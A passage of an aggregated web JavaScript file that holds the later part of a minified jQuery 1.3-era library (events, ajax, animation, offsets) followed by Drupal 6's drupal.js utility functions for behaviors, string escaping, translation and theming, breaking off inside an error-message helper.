handle=jQuery.data(elem,"handle");if(handle)val=handle.apply(elem,data);if((!fn||(jQuery.nodeName(elem,'a')&&type=="click"))&&elem["on"+type]&&elem["on"+type].apply(elem,data)===false)val=false;if(event)data.shift();if(extra&&jQuery.isFunction(extra)){ret=extra.apply(elem,val==null?data:data.concat(val));if(ret!==undefined)val=ret;}if(fn&&donative!==false&&val!==false&&!(jQuery.nodeName(elem,'a')&&type=="click")){this.triggered=true;try{elem[type]();}catch(e){}}this.triggered=false;}return val;},handle:function(event){var val,ret,namespace,all,handlers;event=arguments[0]=jQuery.event.fix(event||window.event);namespace=event.type.split(".");event.type=namespace[0];namespace=namespace[1];all=!namespace&&!event.exclusive;handlers=(jQuery.data(this,"events")||{})[event.type];for(var j in handlers){var handler=handlers[j];if(all||handler.type==namespace){event.handler=handler;event.data=handler.data;ret=handler.apply(this,arguments);if(val!==false)val=ret;if(ret===false){event.preventDefault();event.stopPropagation();}}}return val;},fix:function(event){if(event[expando]==true)return event;var originalEvent=event;event={originalEvent:originalEvent};var props="altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target timeStamp toElement type view wheelDelta which".split(" ");for(var i=props.length;i;i--)event[props[i]]=originalEvent[props[i]];event[expando]=true;event.preventDefault=function(){if(originalEvent.preventDefault)originalEvent.preventDefault();originalEvent.returnValue=false;};event.stopPropagation=function(){if(originalEvent.stopPropagation)originalEvent.stopPropagation();originalEvent.cancelBubble=true;};event.timeStamp=event.timeStamp||now();if(!event.target)event.target=event.srcElement||document;if(event.target.nodeType==3)event.target=event.target.parentNode;if(!event.relatedTarget&&event.fromElement)event.relatedTarget=event.fromElement==event.target?event.toElement:event.fromElement;if(event.pageX==null&&event.clientX!=null){var doc=document.documentElement,body=document.body;event.pageX=event.clientX+(doc&&doc.scrollLeft||body&&body.scrollLeft||0)-(doc.clientLeft||0);event.pageY=event.clientY+(doc&&doc.scrollTop||body&&body.scrollTop||0)-(doc.clientTop||0);}if(!event.which&&((event.charCode||event.charCode===0)?event.charCode:event.keyCode))event.which=event.charCode||event.keyCode;if(!event.metaKey&&event.ctrlKey)event.metaKey=event.ctrlKey;if(!event.which&&event.button)event.which=(event.button&1?1:(event.button&2?3:(event.button&4?2:0)));return event;},proxy:function(fn,proxy){proxy.guid=fn.guid=fn.guid||proxy.guid||this.guid++;return proxy;},special:{ready:{setup:function(){bindReady();return;},teardown:function(){return;}},mouseenter:{setup:function(){if(jQuery.browser.msie)return false;jQuery(this).bind("mouseover",jQuery.event.special.mouseenter.handler);return true;},teardown:function(){if(jQuery.browser.msie)return false;jQuery(this).unbind("mouseover",jQuery.event.special.mouseenter.handler);return true;},handler:function(event){if(withinElement(event,this))return true;event.type="mouseenter";return jQuery.event.handle.apply(this,arguments);}},mouseleave:{setup:function(){if(jQuery.browser.msie)return false;jQuery(this).bind("mouseout",jQuery.event.special.mouseleave.handler);return true;},teardown:function(){if(jQuery.browser.msie)return false;jQuery(this).unbind("mouseout",jQuery.event.special.mouseleave.handler);return true;},handler:function(event){if(withinElement(event,this))return true;event.type="mouseleave";return jQuery.event.handle.apply(this,arguments);}}}};jQuery.fn.extend({bind:function(type,data,fn){return type=="unload"?this.one(type,data,fn):this.each(function(){jQuery.event.add(this,type,fn||data,fn&&data);});},one:function(type,data,fn){var one=jQuery.event.proxy(fn||data,function(event){jQuery(this).unbind(event,one);return(fn||data).apply(this,arguments);});return this.each(function(){jQuery.event.add(this,type,one,fn&&data);});},unbind:function(type,fn){return this.each(function(){jQuery.event.remove(this,type,fn);});},trigger:function(type,data,fn){return this.each(function(){jQuery.event.trigger(type,data,this,true,fn);});},triggerHandler:function(type,data,fn){return this[0]&&jQuery.event.trigger(type,data,this[0],false,fn);},toggle:function(fn){var args=arguments,i=1;while(i<args.length)jQuery.event.proxy(fn,args[i++]);return this.click(jQuery.event.proxy(fn,function(event){this.lastToggle=(this.lastToggle||0)%i;event.preventDefault();return args[this.lastToggle++].apply(this,arguments)||false;}));},hover:function(fnOver,fnOut){return this.bind('mouseenter',fnOver).bind('mouseleave',fnOut);},ready:function(fn){bindReady();if(jQuery.isReady)fn.call(document,jQuery);else
jQuery.readyList.push(function(){return fn.call(this,jQuery);});return this;}});jQuery.extend({isReady:false,readyList:[],ready:function(){if(!jQuery.isReady){jQuery.isReady=true;if(jQuery.readyList){jQuery.each(jQuery.readyList,function(){this.call(document);});jQuery.readyList=null;}jQuery(document).triggerHandler("ready");}}});var readyBound=false;function bindReady(){if(readyBound)return;readyBound=true;if(document.addEventListener&&!jQuery.browser.opera)document.addEventListener("DOMContentLoaded",jQuery.ready,false);if(jQuery.browser.msie&&window==top)(function(){if(jQuery.isReady)return;try{document.documentElement.doScroll("left");}catch(error){setTimeout(arguments.callee,0);return;}jQuery.ready();})();if(jQuery.browser.opera)document.addEventListener("DOMContentLoaded",function(){if(jQuery.isReady)return;for(var i=0;i<document.styleSheets.length;i++)if(document.styleSheets[i].disabled){setTimeout(arguments.callee,0);return;}jQuery.ready();},false);if(jQuery.browser.safari){var numStyles;(function(){if(jQuery.isReady)return;if(document.readyState!="loaded"&&document.readyState!="complete"){setTimeout(arguments.callee,0);return;}if(numStyles===undefined)numStyles=jQuery("style, link[rel=stylesheet]").length;if(document.styleSheets.length!=numStyles){setTimeout(arguments.callee,0);return;}jQuery.ready();})();}jQuery.event.add(window,"load",jQuery.ready);}jQuery.each(("blur,focus,load,resize,scroll,unload,click,dblclick,"+"mousedown,mouseup,mousemove,mouseover,mouseout,change,select,"+"submit,keydown,keypress,keyup,error").split(","),function(i,name){jQuery.fn[name]=function(fn){return fn?this.bind(name,fn):this.trigger(name);};});var withinElement=function(event,elem){var parent=event.relatedTarget;while(parent&&parent!=elem)try{parent=parent.parentNode;}catch(error){parent=elem;}return parent==elem;};jQuery(window).bind("unload",function(){jQuery("*").add(document).unbind();});jQuery.fn.extend({_load:jQuery.fn.load,load:function(url,params,callback){if(typeof url!='string')return this._load(url);var off=url.indexOf(" ");if(off>=0){var selector=url.slice(off,url.length);url=url.slice(0,off);}callback=callback||function(){};var type="GET";if(params)if(jQuery.isFunction(params)){callback=params;params=null;}else{params=jQuery.param(params);type="POST";}var self=this;jQuery.ajax({url:url,type:type,dataType:"html",data:params,complete:function(res,status){if(status=="success"||status=="notmodified")self.html(selector?jQuery("<div/>").append(res.responseText.replace(/<script(.|\s)*?\/script>/g,"")).find(selector):res.responseText);self.each(callback,[res.responseText,status,res]);}});return this;},serialize:function(){return jQuery.param(this.serializeArray());},serializeArray:function(){return this.map(function(){return jQuery.nodeName(this,"form")?jQuery.makeArray(this.elements):this;}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password/i.test(this.type));}).map(function(i,elem){var val=jQuery(this).val();return val==null?null:val.constructor==Array?jQuery.map(val,function(val,i){return{name:elem.name,value:val};}):{name:elem.name,value:val};}).get();}});jQuery.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","),function(i,o){jQuery.fn[o]=function(f){return this.bind(o,f);};});var jsc=now();jQuery.extend({get:function(url,data,callback,type){if(jQuery.isFunction(data)){callback=data;data=null;}return jQuery.ajax({type:"GET",url:url,data:data,success:callback,dataType:type});},getScript:function(url,callback){return jQuery.get(url,null,callback,"script");},getJSON:function(url,data,callback){return jQuery.get(url,data,callback,"json");},post:function(url,data,callback,type){if(jQuery.isFunction(data)){callback=data;data={};}return jQuery.ajax({type:"POST",url:url,data:data,success:callback,dataType:type});},ajaxSetup:function(settings){jQuery.extend(jQuery.ajaxSettings,settings);},ajaxSettings:{url:location.href,global:true,type:"GET",timeout:0,contentType:"application/x-www-form-urlencoded",processData:true,async:true,data:null,username:null,password:null,accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},ajax:function(s){s=jQuery.extend(true,s,jQuery.extend(true,{},jQuery.ajaxSettings,s));var jsonp,jsre=/=\?(&|$)/g,status,data,type=s.type.toUpperCase();if(s.data&&s.processData&&typeof s.data!="string")s.data=jQuery.param(s.data);if(s.dataType=="jsonp"){if(type=="GET"){if(!s.url.match(jsre))s.url+=(s.url.match(/\?/)?"&":"?")+(s.jsonp||"callback")+"=?";}else if(!s.data||!s.data.match(jsre))s.data=(s.data?s.data+"&":"")+(s.jsonp||"callback")+"=?";s.dataType="json";}if(s.dataType=="json"&&(s.data&&s.data.match(jsre)||s.url.match(jsre))){jsonp="jsonp"+jsc++;if(s.data)s.data=(s.data+"").replace(jsre,"="+jsonp+"$1");s.url=s.url.replace(jsre,"="+jsonp+"$1");s.dataType="script";window[jsonp]=function(tmp){data=tmp;success();complete();window[jsonp]=undefined;try{delete window[jsonp];}catch(e){}if(head)head.removeChild(script);};}if(s.dataType=="script"&&s.cache==null)s.cache=false;if(s.cache===false&&type=="GET"){var ts=now();var ret=s.url.replace(/(\?|&)_=.*?(&|$)/,"$1_="+ts+"$2");s.url=ret+((ret==s.url)?(s.url.match(/\?/)?"&":"?")+"_="+ts:"");}if(s.data&&type=="GET"){s.url+=(s.url.match(/\?/)?"&":"?")+s.data;s.data=null;}if(s.global&&!jQuery.active++)jQuery.event.trigger("ajaxStart");var remote=/^(?:\w+:)?\/\/([^\/?#]+)/;if(s.dataType=="script"&&type=="GET"&&remote.test(s.url)&&remote.exec(s.url)[1]!=location.host){var head=document.getElementsByTagName("head")[0];var script=document.createElement("script");script.src=s.url;if(s.scriptCharset)script.charset=s.scriptCharset;if(!jsonp){var done=false;script.onload=script.onreadystatechange=function(){if(!done&&(!this.readyState||this.readyState=="loaded"||this.readyState=="complete")){done=true;success();complete();head.removeChild(script);}};}head.appendChild(script);return undefined;}var requestDone=false;var xhr=window.ActiveXObject?new ActiveXObject("Microsoft.XMLHTTP"):new XMLHttpRequest();if(s.username)xhr.open(type,s.url,s.async,s.username,s.password);else
xhr.open(type,s.url,s.async);try{if(s.data)xhr.setRequestHeader("Content-Type",s.contentType);if(s.ifModified)xhr.setRequestHeader("If-Modified-Since",jQuery.lastModified[s.url]||"Thu, 01 Jan 1970 00:00:00 GMT");xhr.setRequestHeader("X-Requested-With","XMLHttpRequest");xhr.setRequestHeader("Accept",s.dataType&&s.accepts[s.dataType]?s.accepts[s.dataType]+", */*":s.accepts._default);}catch(e){}if(s.beforeSend&&s.beforeSend(xhr,s)===false){s.global&&jQuery.active--;xhr.abort();return false;}if(s.global)jQuery.event.trigger("ajaxSend",[xhr,s]);var onreadystatechange=function(isTimeout){if(!requestDone&&xhr&&(xhr.readyState==4||isTimeout=="timeout")){requestDone=true;if(ival){clearInterval(ival);ival=null;}status=isTimeout=="timeout"&&"timeout"||!jQuery.httpSuccess(xhr)&&"error"||s.ifModified&&jQuery.httpNotModified(xhr,s.url)&&"notmodified"||"success";if(status=="success"){try{data=jQuery.httpData(xhr,s.dataType,s.dataFilter);}catch(e){status="parsererror";}}if(status=="success"){var modRes;try{modRes=xhr.getResponseHeader("Last-Modified");}catch(e){}if(s.ifModified&&modRes)jQuery.lastModified[s.url]=modRes;if(!jsonp)success();}else
jQuery.handleError(s,xhr,status);complete();if(s.async)xhr=null;}};if(s.async){var ival=setInterval(onreadystatechange,13);if(s.timeout>0)setTimeout(function(){if(xhr){xhr.abort();if(!requestDone)onreadystatechange("timeout");}},s.timeout);}try{xhr.send(s.data);}catch(e){jQuery.handleError(s,xhr,null,e);}if(!s.async)onreadystatechange();function success(){if(s.success)s.success(data,status);if(s.global)jQuery.event.trigger("ajaxSuccess",[xhr,s]);}function complete(){if(s.complete)s.complete(xhr,status);if(s.global)jQuery.event.trigger("ajaxComplete",[xhr,s]);if(s.global&&!--jQuery.active)jQuery.event.trigger("ajaxStop");}return xhr;},handleError:function(s,xhr,status,e){if(s.error)s.error(xhr,status,e);if(s.global)jQuery.event.trigger("ajaxError",[xhr,s,e]);},active:0,httpSuccess:function(xhr){try{return!xhr.status&&location.protocol=="file:"||(xhr.status>=200&&xhr.status<300)||xhr.status==304||xhr.status==1223||jQuery.browser.safari&&xhr.status==undefined;}catch(e){}return false;},httpNotModified:function(xhr,url){try{var xhrRes=xhr.getResponseHeader("Last-Modified");return xhr.status==304||xhrRes==jQuery.lastModified[url]||jQuery.browser.safari&&xhr.status==undefined;}catch(e){}return false;},httpData:function(xhr,type,filter){var ct=xhr.getResponseHeader("content-type"),xml=type=="xml"||!type&&ct&&ct.indexOf("xml")>=0,data=xml?xhr.responseXML:xhr.responseText;if(xml&&data.documentElement.tagName=="parsererror")throw"parsererror";if(filter)data=filter(data,type);if(type=="script")jQuery.globalEval(data);if(type=="json")data=eval("("+data+")");return data;},param:function(a){var s=[];if(a.constructor==Array||a.jquery)jQuery.each(a,function(){s.push(encodeURIComponent(this.name)+"="+encodeURIComponent(this.value));});else
for(var j in a)if(a[j]&&a[j].constructor==Array)jQuery.each(a[j],function(){s.push(encodeURIComponent(j)+"="+encodeURIComponent(this));});else
s.push(encodeURIComponent(j)+"="+encodeURIComponent(jQuery.isFunction(a[j])?a[j]():a[j]));return s.join("&").replace(/%20/g,"+");}});jQuery.fn.extend({show:function(speed,callback){return speed?this.animate({height:"show",width:"show",opacity:"show"},speed,callback):this.filter(":hidden").each(function(){this.style.display=this.oldblock||"";if(jQuery.css(this,"display")=="none"){var elem=jQuery("<"+this.tagName+" />").appendTo("body");this.style.display=elem.css("display");if(this.style.display=="none")this.style.display="block";elem.remove();}}).end();},hide:function(speed,callback){return speed?this.animate({height:"hide",width:"hide",opacity:"hide"},speed,callback):this.filter(":visible").each(function(){this.oldblock=this.oldblock||jQuery.css(this,"display");this.style.display="none";}).end();},_toggle:jQuery.fn.toggle,toggle:function(fn,fn2){return jQuery.isFunction(fn)&&jQuery.isFunction(fn2)?this._toggle.apply(this,arguments):fn?this.animate({height:"toggle",width:"toggle",opacity:"toggle"},fn,fn2):this.each(function(){jQuery(this)[jQuery(this).is(":hidden")?"show":"hide"]();});},slideDown:function(speed,callback){return this.animate({height:"show"},speed,callback);},slideUp:function(speed,callback){return this.animate({height:"hide"},speed,callback);},slideToggle:function(speed,callback){return this.animate({height:"toggle"},speed,callback);},fadeIn:function(speed,callback){return this.animate({opacity:"show"},speed,callback);},fadeOut:function(speed,callback){return this.animate({opacity:"hide"},speed,callback);},fadeTo:function(speed,to,callback){return this.animate({opacity:to},speed,callback);},animate:function(prop,speed,easing,callback){var optall=jQuery.speed(speed,easing,callback);return this[optall.queue===false?"each":"queue"](function(){if(this.nodeType!=1)return false;var opt=jQuery.extend({},optall),p,hidden=jQuery(this).is(":hidden"),self=this;for(p in prop){if(prop[p]=="hide"&&hidden||prop[p]=="show"&&!hidden)return opt.complete.call(this);if(p=="height"||p=="width"){opt.display=jQuery.css(this,"display");opt.overflow=this.style.overflow;}}if(opt.overflow!=null)this.style.overflow="hidden";opt.curAnim=jQuery.extend({},prop);jQuery.each(prop,function(name,val){var e=new jQuery.fx(self,opt,name);if(/toggle|show|hide/.test(val))e[val=="toggle"?hidden?"show":"hide":val](prop);else{var parts=val.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),start=e.cur(true)||0;if(parts){var end=parseFloat(parts[2]),unit=parts[3]||"px";if(unit!="px"){self.style[name]=(end||1)+unit;start=((end||1)/e.cur(true))*start;self.style[name]=start+unit;}if(parts[1])end=((parts[1]=="-="?-1:1)*end)+start;e.custom(start,end,unit);}else
e.custom(start,val,"");}});return true;});},queue:function(type,fn){if(jQuery.isFunction(type)||(type&&type.constructor==Array)){fn=type;type="fx";}if(!type||(typeof type=="string"&&!fn))return queue(this[0],type);return this.each(function(){if(fn.constructor==Array)queue(this,type,fn);else{queue(this,type).push(fn);if(queue(this,type).length==1)fn.call(this);}});},stop:function(clearQueue,gotoEnd){var timers=jQuery.timers;if(clearQueue)this.queue([]);this.each(function(){for(var i=timers.length-1;i>=0;i--)if(timers[i].elem==this){if(gotoEnd)timers[i](true);timers.splice(i,1);}});if(!gotoEnd)this.dequeue();return this;}});var queue=function(elem,type,array){if(elem){type=type||"fx";var q=jQuery.data(elem,type+"queue");if(!q||array)q=jQuery.data(elem,type+"queue",jQuery.makeArray(array));}return q;};jQuery.fn.dequeue=function(type){type=type||"fx";return this.each(function(){var q=queue(this,type);q.shift();if(q.length)q[0].call(this);});};jQuery.extend({speed:function(speed,easing,fn){var opt=speed&&speed.constructor==Object?speed:{complete:fn||!fn&&easing||jQuery.isFunction(speed)&&speed,duration:speed,easing:fn&&easing||easing&&easing.constructor!=Function&&easing};opt.duration=(opt.duration&&opt.duration.constructor==Number?opt.duration:jQuery.fx.speeds[opt.duration])||jQuery.fx.speeds.def;opt.old=opt.complete;opt.complete=function(){if(opt.queue!==false)jQuery(this).dequeue();if(jQuery.isFunction(opt.old))opt.old.call(this);};return opt;},easing:{linear:function(p,n,firstNum,diff){return firstNum+diff*p;},swing:function(p,n,firstNum,diff){return((-Math.cos(p*Math.PI)/2)+0.5)*diff+firstNum;}},timers:[],timerId:null,fx:function(elem,options,prop){this.options=options;this.elem=elem;this.prop=prop;if(!options.orig)options.orig={};}});jQuery.fx.prototype={update:function(){if(this.options.step)this.options.step.call(this.elem,this.now,this);(jQuery.fx.step[this.prop]||jQuery.fx.step._default)(this);if(this.prop=="height"||this.prop=="width")this.elem.style.display="block";},cur:function(force){if(this.elem[this.prop]!=null&&this.elem.style[this.prop]==null)return this.elem[this.prop];var r=parseFloat(jQuery.css(this.elem,this.prop,force));return r&&r>-10000?r:parseFloat(jQuery.curCSS(this.elem,this.prop))||0;},custom:function(from,to,unit){this.startTime=now();this.start=from;this.end=to;this.unit=unit||this.unit||"px";this.now=this.start;this.pos=this.state=0;this.update();var self=this;function t(gotoEnd){return self.step(gotoEnd);}t.elem=this.elem;jQuery.timers.push(t);if(jQuery.timerId==null){jQuery.timerId=setInterval(function(){var timers=jQuery.timers;for(var i=0;i<timers.length;i++)if(!timers[i]())timers.splice(i--,1);if(!timers.length){clearInterval(jQuery.timerId);jQuery.timerId=null;}},13);}},show:function(){this.options.orig[this.prop]=jQuery.attr(this.elem.style,this.prop);this.options.show=true;this.custom(0,this.cur());if(this.prop=="width"||this.prop=="height")this.elem.style[this.prop]="1px";jQuery(this.elem).show();},hide:function(){this.options.orig[this.prop]=jQuery.attr(this.elem.style,this.prop);this.options.hide=true;this.custom(this.cur(),0);},step:function(gotoEnd){var t=now();if(gotoEnd||t>this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;var done=true;for(var i in this.options.curAnim)if(this.options.curAnim[i]!==true)done=false;if(done){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;this.elem.style.display=this.options.display;if(jQuery.css(this.elem,"display")=="none")this.elem.style.display="block";}if(this.options.hide)this.elem.style.display="none";if(this.options.hide||this.options.show)for(var p in this.options.curAnim)jQuery.attr(this.elem.style,p,this.options.orig[p]);}if(done)this.options.complete.call(this.elem);return false;}else{var n=t-this.startTime;this.state=n/this.options.duration;this.pos=jQuery.easing[this.options.easing||(jQuery.easing.swing?"swing":"linear")](this.state,n,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update();}return true;}};jQuery.extend(jQuery.fx,{speeds:{slow:600,fast:200,def:400},step:{scrollLeft:function(fx){fx.elem.scrollLeft=fx.now;},scrollTop:function(fx){fx.elem.scrollTop=fx.now;},opacity:function(fx){jQuery.attr(fx.elem.style,"opacity",fx.now);},_default:function(fx){fx.elem.style[fx.prop]=fx.now+fx.unit;}}});jQuery.fn.offset=function(){var left=0,top=0,elem=this[0],results;if(elem)with(jQuery.browser){var parent=elem.parentNode,offsetChild=elem,offsetParent=elem.offsetParent,doc=elem.ownerDocument,safari2=safari&&parseInt(version)<522&&!/adobeair/i.test(userAgent),css=jQuery.curCSS,fixed=css(elem,"position")=="fixed";if(elem.getBoundingClientRect){var box=elem.getBoundingClientRect();add(box.left+Math.max(doc.documentElement.scrollLeft,doc.body.scrollLeft),box.top+Math.max(doc.documentElement.scrollTop,doc.body.scrollTop));add(-doc.documentElement.clientLeft,-doc.documentElement.clientTop);}else{add(elem.offsetLeft,elem.offsetTop);while(offsetParent){add(offsetParent.offsetLeft,offsetParent.offsetTop);if(mozilla&&!/^t(able|d|h)$/i.test(offsetParent.tagName)||safari&&!safari2)border(offsetParent);if(!fixed&&css(offsetParent,"position")=="fixed")fixed=true;offsetChild=/^body$/i.test(offsetParent.tagName)?offsetChild:offsetParent;offsetParent=offsetParent.offsetParent;}while(parent&&parent.tagName&&!/^body|html$/i.test(parent.tagName)){if(!/^inline|table.*$/i.test(css(parent,"display")))add(-parent.scrollLeft,-parent.scrollTop);if(mozilla&&css(parent,"overflow")!="visible")border(parent);parent=parent.parentNode;}if((safari2&&(fixed||css(offsetChild,"position")=="absolute"))||(mozilla&&css(offsetChild,"position")!="absolute"))add(-doc.body.offsetLeft,-doc.body.offsetTop);if(fixed)add(Math.max(doc.documentElement.scrollLeft,doc.body.scrollLeft),Math.max(doc.documentElement.scrollTop,doc.body.scrollTop));}results={top:top,left:left};}function border(elem){add(jQuery.curCSS(elem,"borderLeftWidth",true),jQuery.curCSS(elem,"borderTopWidth",true));}function add(l,t){left+=parseInt(l,10)||0;top+=parseInt(t,10)||0;}return results;};jQuery.fn.extend({position:function(){var left=0,top=0,results;if(this[0]){var offsetParent=this.offsetParent(),offset=this.offset(),parentOffset=/^body|html$/i.test(offsetParent[0].tagName)?{top:0,left:0}:offsetParent.offset();offset.top-=num(this,'marginTop');offset.left-=num(this,'marginLeft');parentOffset.top+=num(offsetParent,'borderTopWidth');parentOffset.left+=num(offsetParent,'borderLeftWidth');results={top:offset.top-parentOffset.top,left:offset.left-parentOffset.left};}return results;},offsetParent:function(){var offsetParent=this[0].offsetParent;while(offsetParent&&(!/^body|html$/i.test(offsetParent.tagName)&&jQuery.css(offsetParent,'position')=='static'))offsetParent=offsetParent.offsetParent;return jQuery(offsetParent);}});jQuery.each(['Left','Top'],function(i,name){var method='scroll'+name;jQuery.fn[method]=function(val){if(!this[0])return;return val!=undefined?this.each(function(){this==window||this==document?window.scrollTo(!i?val:jQuery(window).scrollLeft(),i?val:jQuery(window).scrollTop()):this[method]=val;}):this[0]==window||this[0]==document?self[i?'pageYOffset':'pageXOffset']||jQuery.boxModel&&document.documentElement[method]||document.body[method]:this[0][method];};});jQuery.each(["Height","Width"],function(i,name){var tl=i?"Left":"Top",br=i?"Right":"Bottom";jQuery.fn["inner"+name]=function(){return this[name.toLowerCase()]()+num(this,"padding"+tl)+num(this,"padding"+br);};jQuery.fn["outer"+name]=function(margin){return this["inner"+name]()+num(this,"border"+tl+"Width")+num(this,"border"+br+"Width")+(margin?num(this,"margin"+tl)+num(this,"margin"+br):0);};});})();;
// $Id: drupal.js,v 1.41.2.4 2009/07/21 08:59:10 goba Exp $

var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} };

/**
 * Set the variable that indicates if JavaScript behaviors should be applied
 */
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;

/**
 * Attach all registered behaviors to a page element.
 *
 * Behaviors are event-triggered actions that attach to page elements, enhancing
 * default non-Javascript UIs. Behaviors are registered in the Drupal.behaviors
 * object as follows:
 * @code
 *    Drupal.behaviors.behaviorName = function () {
 *      ...
 *    };
 * @endcode
 *
 * Drupal.attachBehaviors is added below to the jQuery ready event and so
 * runs on initial page load. Developers implementing AHAH/AJAX in their
 * solutions should also call this function after new page content has been
 * loaded, feeding in an element to be processed, in order to attach all
 * behaviors to the new content.
 *
 * Behaviors should use a class in the form behaviorName-processed to ensure
 * the behavior is attached only once to a given element. (Doing so enables
 * the reprocessing of given elements, which may be needed on occasion despite
 * the ability to limit behavior attachment to a particular element.)
 *
 * @param context
 *   An element to attach behaviors to. If none is given, the document element
 *   is used.
 */
Drupal.attachBehaviors = function(context) {
  context = context || document;
  if (Drupal.jsEnabled) {
    // Execute all of them.
    jQuery.each(Drupal.behaviors, function() {
      this(context);
    });
  }
};

/**
 * Encode special characters in a plain-text string for display as HTML.
 */
Drupal.checkPlain = function(str) {
  str = String(str);
  var replace = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;' };
  for (var character in replace) {
    var regex = new RegExp(character, 'g');
    str = str.replace(regex, replace[character]);
  }
  return str;
};

/**
 * Translate strings to the page language or a given language.
 *
 * See the documentation of the server-side t() function for further details.
 *
 * @param str
 *   A string containing the English string to translate.
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 * @return
 *   The translated string.
 */
Drupal.t = function(str, args) {
  // Fetch the localized version of the string.
  if (Drupal.locale.strings && Drupal.locale.strings[str]) {
    str = Drupal.locale.strings[str];
  }

  if (args) {
    // Transform arguments before inserting them
    for (var key in args) {
      switch (key.charAt(0)) {
        // Escaped only
        case '@':
          args[key] = Drupal.checkPlain(args[key]);
        break;
        // Pass-through
        case '!':
          break;
        // Escaped and placeholder
        case '%':
        default:
          args[key] = Drupal.theme('placeholder', args[key]);
          break;
      }
      str = str.replace(key, args[key]);
    }
  }
  return str;
};

/**
 * Format a string containing a count of items.
 *
 * This function ensures that the string is pluralized correctly. Since Drupal.t() is
 * called by this function, make sure not to pass already-localized strings to it.
 *
 * See the documentation of the server-side format_plural() function for further details.
 *
 * @param count
 *   The item count to display.
 * @param singular
 *   The string for the singular case. Please make sure it is clear this is
 *   singular, to ease translation (e.g. use "1 new comment" instead of "1 new").
 *   Do not use @count in the singular string.
 * @param plural
 *   The string for the plural case. Please make sure it is clear this is plural,
 *   to ease translation. Use @count in place of the item count, as in "@count
 *   new comments".
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 *   Note that you do not need to include @count in this array.
 *   This replacement is done automatically for the plural case.
 * @return
 *   A translated string.
 */
Drupal.formatPlural = function(count, singular, plural, args) {
  var args = args || {};
  args['@count'] = count;
  // Determine the index of the plural form.
  var index = Drupal.locale.pluralFormula ? Drupal.locale.pluralFormula(args['@count']) : ((args['@count'] == 1) ? 0 : 1);

  if (index == 0) {
    return Drupal.t(singular, args);
  }
  else if (index == 1) {
    return Drupal.t(plural, args);
  }
  else {
    args['@count['+ index +']'] = args['@count'];
    delete args['@count'];
    return Drupal.t(plural.replace('@count', '@count['+ index +']'));
  }
};

/**
 * Generate the themed representation of a Drupal object.
 *
 * All requests for themed output must go through this function. It examines
 * the request and routes it to the appropriate theme function. If the current
 * theme does not provide an override function, the generic theme function is
 * called.
 *
 * For example, to retrieve the HTML that is output by theme_placeholder(text),
 * call Drupal.theme('placeholder', text).
 *
 * @param func
 *   The name of the theme function to call.
 * @param ...
 *   Additional arguments to pass along to the theme function.
 * @return
 *   Any data the theme function returns. This could be a plain HTML string,
 *   but also a complex object.
 */
Drupal.theme = function(func) {
  for (var i = 1, args = []; i < arguments.length; i++) {
    args.push(arguments[i]);
  }

  return (Drupal.theme[func] || Drupal.theme.prototype[func]).apply(this, args);
};

/**
 * Parse a JSON response.
 *
 * The result is either the JSON object, or an object with 'status' 0 and 'data' an error message.
 */
Drupal.parseJson = function (data) {
  if ((data.substring(0, 1) != '{') && (data.substring(0, 1) != '[')) {
    return { status: 0, data: data.length ? data : Drupal.t('Unspecified error') };
  }
  return eval('(' + data + ');');
};

/**
 * Freeze the current body height (as minimum height). Used to prevent
 * unnecessary upwards scrolling when doing DOM manipulations.
 */
Drupal.freezeHeight = function () {
  Drupal.unfreezeHeight();
  var div = document.createElement('div');
  $(div).css({
    position: 'absolute',
    top: '0px',
    left: '0px',
    width: '1px',
    height: $('body').css('height')
  }).attr('id', 'freeze-height');
  $('body').append(div);
};

/**
 * Unfreeze the body height
 */
Drupal.unfreezeHeight = function () {
  $('#freeze-height').remove();
};

/**
 * Wrapper around encodeURIComponent() which avoids Apache quirks (equivalent of
 * drupal_urlencode() in PHP). This function should only be used on paths, not
 * on query string arguments.
 */
Drupal.encodeURIComponent = function (item, uri) {
  uri = uri || location.href;
  item = encodeURIComponent(item).replace(/%2F/g, '/');
  return (uri.indexOf('?q=') != -1) ? item : item.replace(/%26/g, '%2526').replace(/%23/g, '%2523').replace(/\/\//g, '/%252F');
};

/**
 * Get the text selection in a textarea.
 */
Drupal.getSelection = function (element) {
  if (typeof(element.selectionStart) != 'number' && document.selection) {
    // The current selection
    var range1 = document.selection.createRange();
    var range2 = range1.duplicate();
    // Select all text.
    range2.moveToElementText(element);
    // Now move 'dummy' end point to end point of original range.
    range2.setEndPoint('EndToEnd', range1);
    // Now we can calculate start and end points.
    var start = range2.text.length - range1.text.length;
    var end = start + range1.text.length;
    return { 'start': start, 'end': end };
  }
  return { 'start': element.selectionStart, 'end': element.selectionEnd };
};

/**
 * Build an error message from ahah response.
 */
Drupal.ahahError = function(xmlhttp, uri) {
  if (xmlhttp.status == 200) {
    if (jQuery.trim($(xmlhttp.responseText).text())) {
      var message = Drupal.t("An error occurred. \n@uri\n@text", {'@uri': uri, '@text': xmlhttp.responseText });
